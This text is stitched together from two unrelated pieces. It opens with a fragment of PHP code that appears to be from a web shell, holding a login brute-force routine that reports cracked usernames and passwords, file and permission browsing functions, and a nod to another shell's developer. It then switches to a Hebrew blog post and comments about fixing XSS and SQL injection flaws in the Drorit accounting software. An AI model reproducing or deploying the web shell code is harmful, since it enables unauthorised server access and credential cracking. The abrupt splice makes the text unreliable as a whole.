CURLINFO_HTTP_CODE); if ( curl_errno($ch) == 28 ) { print " Error : Connection Timeout , Sleep for 5s .

"; sleep(5); } else if ( curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user" and Password "$pass"

"; exit; } else{ if($httpcode===0){ echo "No response
"; curl_setopt($ch, CURLOPT_URL, "http://$host:" . $port); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $cont = curl_exec($ch); $farr = explode("URL=",$cont); $narr = explode('">',$farr[1]); echo "Please change to this host -> ". $narr[0]; exit; } //echo $httpcode; } curl_close($ch); } public function DFSCurrent($slashtype){ echo "
Current folder : "; $truepath = array(); if(isset($GLOBALS['DFConfig'][0]['dfp'])){ $path = $this->DFSDirFilter($this->Dec($GLOBALS['DFConfig'][0]['dfp'])); $path = $this->Dec($path); }else{ $path = getcwd(); } $dfsEP = explode($slashtype,$path); $dfsSZ = sizeof(($dfsEP)); $dfsGE = ""; for($c=0;$c<$dfsSZ;$c++){ array_push($truepath,$dfsEP[$c]); } if($GLOBALS['DFSPlatform']!=='win'){ $endslash = $this->DFSDirFilter($slashtype); echo "$slashtype"; } for($i=0;$iDFSDirFilter($dfsGE); //$this->string = preg_replace('/'.$slashtype.$slashtype.'/i',$slashtype,$dfsGE); echo "$dfsEP[$i]"; echo $slashtype; } } echo "
"; } public function DFSOG($file){ if($GLOBALS['DFSPlatform']!=='win'){ $owner_file = (fileowner($file)?:0); $group_file = (filegroup($file)?:0); $checkposix = $this->DFSDat('ini','disable_functions'); if($checkposix !=="None"){ $checkposix = explode(",",$checkposix); if(!in_array("posix_getpwuid",$checkposix)){ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } }else{ $owner_group = "-:-"; } }else{ $ownx = posix_getpwuid($owner_file)['name']?:'nobody'; $grpx = posix_getpwuid($group_file)['name']; if(($ownx!==NULL && $ownx!=="") || ($grpx!==NULL && $grpx!=="")){ $owner_group = $ownx . ':' . ($grpx?:$ownx); }else{ $owner_group = "nobody:nobody"; } } }else{ $owner_group = "-:-"; } return $owner_group; } public function DFSPerms($f) { // Special thanks to marijuana shell developer $p = $GLOBALS['DFSyntax'][1]($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000
זמן עדכון: 01/01/1970 00:00

לפני מספר ימים פרסמתי כאן שתוכנת דרורית להנהלת חשבונות קבלה אישור מס הכנסה.
נראה שמס הכנסה לא בדקו מעבר לבדיקה שטחית...

אתמול העלתי אתר עם התוכנה לאויר ופתחתי אותו לכולם.
תוך שעות ספורות הגיעו דיווחי באגים.

עיקר הדיווחים היו בעיות אבטחה, אני בניגוד לשחר גיבור הספר שלי זריחה חדשה איני מומחה אבטחה ולכן היה די צפוי שיהיו מספר בעיות אבטחה.
הדיווחים עוררו אותי לבדוק לא רק את אותם מקומות בתוכנה בהם נמצאו ליקויים אלא את כל התוכנה.
את הליקויים תיקנתי וכן תיקנתי עוד מקומות עליהם לא קיבלתי דיווח אבל מצאתי בעיות דומות.

הבעיות היו די הגיוניות בסך הכל, היו לא מעט מקומות בהם לא נבדק קלט מהמשתמש שהיה יכול להכיל תגי HTML וסימני גרשיים, מה שהיה גורם במקרה הטוב לבעיות תצוגה ובמקרה הגרוע עלול לאפשר פריצה לבסיס הנתונים.
בעיות המוכרת בשם Cross Site Scripting ו SQL Injection.

להערכתי כל הבעיות הללו תוקנו.

יחד עם זאת יתכן שעדיין יש באגים בתוכנה, אחרי הכל אין תוכנה ללא באגים.

 


הוספת תגובה
יש עדכון ? משה 01/01/1970 00:00:00
הבאגים תוקנו ?

הוספת תגובה      

כן, הבאגים תוקנו אורי עידן 01/01/1970 00:00:00
תוקנו לא מעט באגים וגם נעשו מספר שיפורים.


הוספת תגובה      

אפשר קישור יובל 01/01/1970 00:00:00
לאתר? לתוכנה?

תודה!

הוספת תגובה      

נתתי קישור בפוסט הקודם אורי עידן 01/01/1970 00:00:00
הקישור הוא: http://drorit.helicontech.co.il


הוספת תגובה      

אז זה שירות, או תוכנה? יובל 01/01/1970 00:00:00
לא מצאתי קישור להורדה, או הוראות התקנה או רשיון שימוש וכו'..



הוספת תגובה      

גם וגם אורי עידן 01/01/1970 00:00:00
אפשר להוריד כרגע רק מ CVS ב sf.net/projects/drorit
הרשיון הוא GPL כמובן.


הוספת תגובה      

מעולה, תודה יובל 01/01/1970 00:00:00


הוספת תגובה      

בעיות בהתקנה יובל 01/01/1970 00:00:00
לא ממש הצלחתי להתקין, דיווחתי באגים ב sf.

הוספת תגובה      

לא הצלחתי לשחזר את הבאגים אורי עידן 01/01/1970 00:00:00
אצלי ההתקנה עברה ללא בעיות מספר פעמים.
משהו אצלך בהרשאות למשתמש כנראה לא תקין


הוספת תגובה      

הוסף תגובה

שם:
דואר אלקטרוני: חובה, לא יוצג
אתר אינטרנט:
כותרת:
תוכן:
שלח מייל בתגובה להודעה